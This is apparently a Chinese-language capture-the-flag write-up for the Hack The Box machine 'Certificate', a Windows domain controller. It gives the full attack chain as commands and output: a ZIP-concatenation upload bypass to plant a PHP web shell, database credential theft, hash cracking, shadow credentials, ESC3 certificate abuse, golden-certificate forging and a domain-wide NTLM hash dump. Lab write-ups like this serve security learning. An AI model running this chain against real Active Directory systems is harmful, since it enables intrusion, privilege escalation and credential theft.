基本信息

端口扫描

80和一些常规windows域端口:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
$ nmap -sC -sV -Pn 10.10.11.71
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-02 14:53 JST
Nmap scan report for 10.10.11.71
Host is up (0.18s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.0.30)
|_http-title: Did not follow redirect to http://certificate.htb/
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-06-02 13:34:05Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Not valid before: 2024-11-04T03:14:54
|_Not valid after:  2025-11-04T03:14:54
|_ssl-date: 2025-06-02T13:35:28+00:00; +7h38m36s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-02T13:35:29+00:00; +7h38m36s from scanner time.
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Not valid before: 2024-11-04T03:14:54
|_Not valid after:  2025-11-04T03:14:54
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Not valid before: 2024-11-04T03:14:54
|_Not valid after:  2025-11-04T03:14:54
|_ssl-date: 2025-06-02T13:35:28+00:00; +7h38m36s from scanner time.
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-02T13:35:29+00:00; +7h38m36s from scanner time.
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Not valid before: 2024-11-04T03:14:54
|_Not valid after:  2025-11-04T03:14:54
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Hosts: certificate.htb, DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7h38m35s, deviation: 0s, median: 7h38m35s
| smb2-time:
|   date: 2025-06-02T13:34:52
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 184.78 seconds

80

需要加hosts:

1
10.10.11.71 certificate.htb dc01.certificate.htb

在线教育相关的:

Certificate

随意注册学生账号登录(另外有个教师账号选项吗,注册需要管理员审核,常规这种应该是XSS,但这台机器不是)

course

随意加入一门课程,在quiz里可以上传文件:

uploads

提示只接受指定类型文件,并且测试发现zip文件会自动解压,并且检查其中文件类型,并且对文件内容存在MIME type检查:

ZIP Concatenation

搜索可以找到ZIP Concatenation相关技术,一个合法zip加一个恶意zip上传获取shell:

1
2
3
4
5
6
7
8
9
zip miao.zip miao.pdf

mkdir shell
cd shell
nano shell.php

zip -r shell.zip shell/

cat miao.zip shell.zip > miaomiao.zip

然后修改文件路径为实际的shelll路径,访问获得xamppuser shell:

1
http://certificate.htb/static/uploads/07745dfb2ce97f9e6c558552ee78ef6d/shell/shell.php

mysql

db.php

常规翻文件,得到数据库密码:

1
2
3
4
PS C:\xampp\htdocs\certificate.htb> cat db.php

$db_user = 'certificate_webapp_user'; // Change to your DB username
$db_passwd = 'cert!f!c@teDBPWD'; // Change to your DB password

mysql

之后就是从数据库中获取信息,得到几条hash,破解:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
# PS C:\xampp\mysql\bin>
.\mysql.exe -u certificate_webapp_user -p'cert!f!c@teDBPWD' -D Certificate_WEBAPP_DB -e "SHOW TABLES;"

.\mysql.exe -u certificate_webapp_user -p'cert!f!c@teDBPWD' -D Certificate_WEBAPP_DB -e "desc users;"

.\mysql.exe -u certificate_webapp_user -p'cert!f!c@teDBPWD' -D Certificate_WEBAPP_DB -e "select username,email,password from users;"

Lorra.AAA	lorra.aaa@certificate.htb	$2y$04$bZs2FUjVRiFswY84CUR8ve02ymuiy0QD23XOKFuT6IM2sBbgQvEFG
Sara1200	sara1200@gmail.com	$2y$04$pgTOAkSnYMQoILmL6MRXLOOfFlZUPR4lAD2kvWZj.i/dyvXNSqCkK
Johney	johny009@mail.com	$2y$04$VaUEcSd6p5NnpgwnHyh8zey13zo/hL7jfQd9U.PGyEW3yqBf.IxRq
havokww	havokww@hotmail.com	$2y$04$XSXoFSfcMoS5Zp8ojTeUSOj6ENEun6oWM93mvRQgvaBufba5I5nti
stev	steven@yahoo.com	$2y$04$6FHP.7xTHRGYRI9kRIo7deUHz0LX.vx2ixwv0cOW6TDtRGgOhRFX2
sara.b	sara.b@certificate.htb	$2y$04$CgDe/Thzw/Em/M4SkmXNbu0YdFo6uUs3nB.pzQPV.g8UdXikZNdH6

# 可以破解出sara.b 密码
sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Blink182

sara.b to lion.sk

登录sara.b,还没到user,顺便跑一下bloodhound:

1
2
3
evil-winrm -i 10.10.11.71 -u sara.b -p 'Blink182'

bloodhound-python -u sara.b -p 'Blink182' -d 'certificate.htb' -ns 10.10.11.71 --zip -c All -dc 'dc01.certificate.htb'

WS-01

Sara.B Documents里有个WS-01,里面是一个pcap文件,看描述是包含有效认证信息的,所以下载到本地提取:

这部分和之前的Office类似,提取出来处理下格式破解:

1
2
3
4
5
6
7
8
9
tshark -r ./WS-01_PktMon.pcap -Y "kerberos.msg_type == 10 && kerberos.cipher && kerberos.realm && kerberos.CNameString" -T fields -e kerberos.CNameString -e kerberos.realm -e kerberos.cipher -E separator=$

Lion.SK$CERTIFICATE$23f5159fa1c66ed7b0e561543eba6c010cd31f7e4a4377c2925cf306b98ed1e4f3951a50bc083c9bc0f16f0f586181c9d4ceda3fb5e852f0

$krb5pa$18$Lion.SK$CERTIFICATE.HTB$23f5159fa1c66ed7b0e561543eba6c010cd31f7e4a4377c2925cf306b98ed1e4f3951a50bc083c9bc0f16f0f586181c9d4ceda3fb5e852f0

sudo hashcat -m 19900 hash.txt ~/Tools/dict/rockyou.txt

!QAZ2wsx

非预期 to lion.sk & ryan.k

sara.b是account operators组成员,对其他组GenericAll:

所以直接shadow creds即可(也可以直接改密码,所以这里可能会得到别人修改后的hash):

1
2
3
4
5
faketime "$(curl -sik http://10.10.11.71:5985 | grep -i 'Date: ' | sed s/'Date: '//g)" bash

certipy shadow auto -username 'sara.b@certificate.htb' -password 'Blink182' -account 'lion.sk' -target 'certificate.htb' -dc-ip 10.10.11.71

[*] NT hash for 'Lion.SK': 3b24c391862f4a8531a245a0217708c4

同样,这里也可以非预期直接跳到ryan.k

1
2
3
certipy shadow auto -username 'sara.b@certificate.htb' -password 'Blink182' -account 'ryan.k' -target 'certificate.htb' -dc-ip 10.10.11.71

[*] NT hash for 'Ryan.K': b1bc3d70e70f4f36b1509a65ae1a2ae6

user flag

lion.sk登录:

1
evil-winrm -i 10.10.11.71 -u lion.sk -p '!QAZ2wsx'

ESC3 to ryan.k

根据lion.sk所属组的描述去看证书相关的,常规certipy可以发现ESC3

1
2
3
4
5
6
7
8
9
10
11
certipy find -u lion.sk -p '!QAZ2wsx' -target certificate.htb  -stdout -vulnerable

certipy find -u lion.sk -p '!QAZ2wsx' -target certificate.htb  -stdout 

Template Name                      Delegated-CRA
Enrollment Agent                    : True

Template Name                       : SignedUser

[*] Remarks
ESC3 Target Template              : Template can be targeted as part of ESC3 exploitation. This is not a vulnerability by itself. See the wiki for more details. Template requires a signature with the Certificate Request Agent application policy.

按照wiki一步步:

目标用户选择ryan.k,因为是DOMAIN STORAGE MANAGERS成员

1
2
3
4
5
6
7
certipy req -u lion.sk -p '!QAZ2wsx' -dc-ip 10.10.11.71 -target dc01.certificate.htb -ca Certificate-LTD-CA -template Delegated-CRA

certipy req -u lion.sk -p '!QAZ2wsx' -dc-ip 10.10.11.71 -target dc01.certificate.htb -ca Certificate-LTD-CA -template SignedUser -pfx lion.sk.pfx -on-behalf-of 'CERTIFICATE\RYAN.K'

certipy auth -pfx ryan.k.pfx -dc-ip 10.10.11.71

[*] Got hash for 'ryan.k@certificate.htb': aad3b435b51404eeaad3b435b51404ee:b1bc3d70e70f4f36b1509a65ae1a2ae6

ryan.k & SeManageVolumePrivilege

登录ryan.k,可以看到一个SeManageVolumePrivilege:

1
evil-winrm -i 10.10.11.71 -u ryan.k -H b1bc3d70e70f4f36b1509a65ae1a2ae6

搜索可以找到:

按照描述,执行后将赋予我们对C盘的完全访问权限,我们可以访问Administrator目录,但并不能直接读取root.txt:

1
C:\Users\Ryan.K\Documents\SeManageVolumeExploit.exe

certutil

但我们可以导出CA根证书

1
2
3
4
5
6
7
certutil -store ca
Serial Number: 75b2f4bbf31f108945147b466131bdca
Issuer: CN=Certificate-LTD-CA, DC=certificate, DC=htb
Template: CA, Root Certification Authority

certutil -exportPFX ca 75b2f4bbf31f108945147b466131bdca .\certificate.pfx
download certificate.pfx

Golden Certificates to root

得到根证书后就是Golden Certificates:

1
2
3
4
5
certipy forge -ca-pfx certificate.pfx -upn Administrator@certificate.htb -subject 'CN=ADMINISTRATOR,CN=USERS,DC=CERTIFICATE,DC=HTB'

certipy auth -pfx administrator_forged.pfx -dc-ip 10.10.11.71

[*] Got hash for 'administrator@certificate.htb': aad3b435b51404eeaad3b435b51404ee:d804304519bf0143c14cbf1c024408c6

hashdump

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
impacket-secretsdump Administrator@10.10.11.71 -hashes :d804304519bf0143c14cbf1c024408c6 -just-dc-ntlm

Administrator:500:aad3b435b51404eeaad3b435b51404ee:d804304519bf0143c14cbf1c024408c6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9de0f65ce37b57bc0a8fce1f9d4402c7:::
Kai.X:1105:aad3b435b51404eeaad3b435b51404ee:003c4c38e98c78352362095a6028f720:::
Sara.B:1109:aad3b435b51404eeaad3b435b51404ee:c2367169e3279fa3e85d9d25f0e85e45:::
John.C:1111:aad3b435b51404eeaad3b435b51404ee:3f6d0e5bbf21d7f1c72a8eebc82547f5:::
Aya.W:1112:aad3b435b51404eeaad3b435b51404ee:a72e757f0f5859819e90d1a71666f933:::
Nya.S:1113:aad3b435b51404eeaad3b435b51404ee:a72e757f0f5859819e90d1a71666f933:::
Maya.K:1114:aad3b435b51404eeaad3b435b51404ee:a72e757f0f5859819e90d1a71666f933:::
Lion.SK:1115:aad3b435b51404eeaad3b435b51404ee:3b24c391862f4a8531a245a0217708c4:::
Eva.F:1116:aad3b435b51404eeaad3b435b51404ee:f30914c4b456ef5691bf24b50b332e99:::
Ryan.K:1117:aad3b435b51404eeaad3b435b51404ee:b1bc3d70e70f4f36b1509a65ae1a2ae6:::
certificate.htb\akeder.kh:1119:aad3b435b51404eeaad3b435b51404ee:9ca9ba1e46bd75574002b8b1967bb2de:::
kara.m:1121:aad3b435b51404eeaad3b435b51404ee:831a13eb0ff31d5b80eb062f24bfb210:::
Alex.D:1124:aad3b435b51404eeaad3b435b51404ee:32be964c0519ef40083157825c7949ca:::
certificate.htb\karol.s:1127:aad3b435b51404eeaad3b435b51404ee:a242ea4fbd87f0feff1203bad168b770:::
saad.m:1128:aad3b435b51404eeaad3b435b51404ee:a242ea4fbd87f0feff1203bad168b770:::
xamppuser:1130:aad3b435b51404eeaad3b435b51404ee:ed547ca356c218f5e76c2640fc3429ab:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:f36e0bc3c9a34c3acdb8b79df54f27cd:::
WS-01$:1103:aad3b435b51404eeaad3b435b51404ee:3641f1cd0daa8dfe41e1d1b2dbbed6f4:::
WS-05$:1131:aad3b435b51404eeaad3b435b51404ee:eae20b8c895e7ac2e1a4870f71738058:::
[*] Cleaning up..

参考资料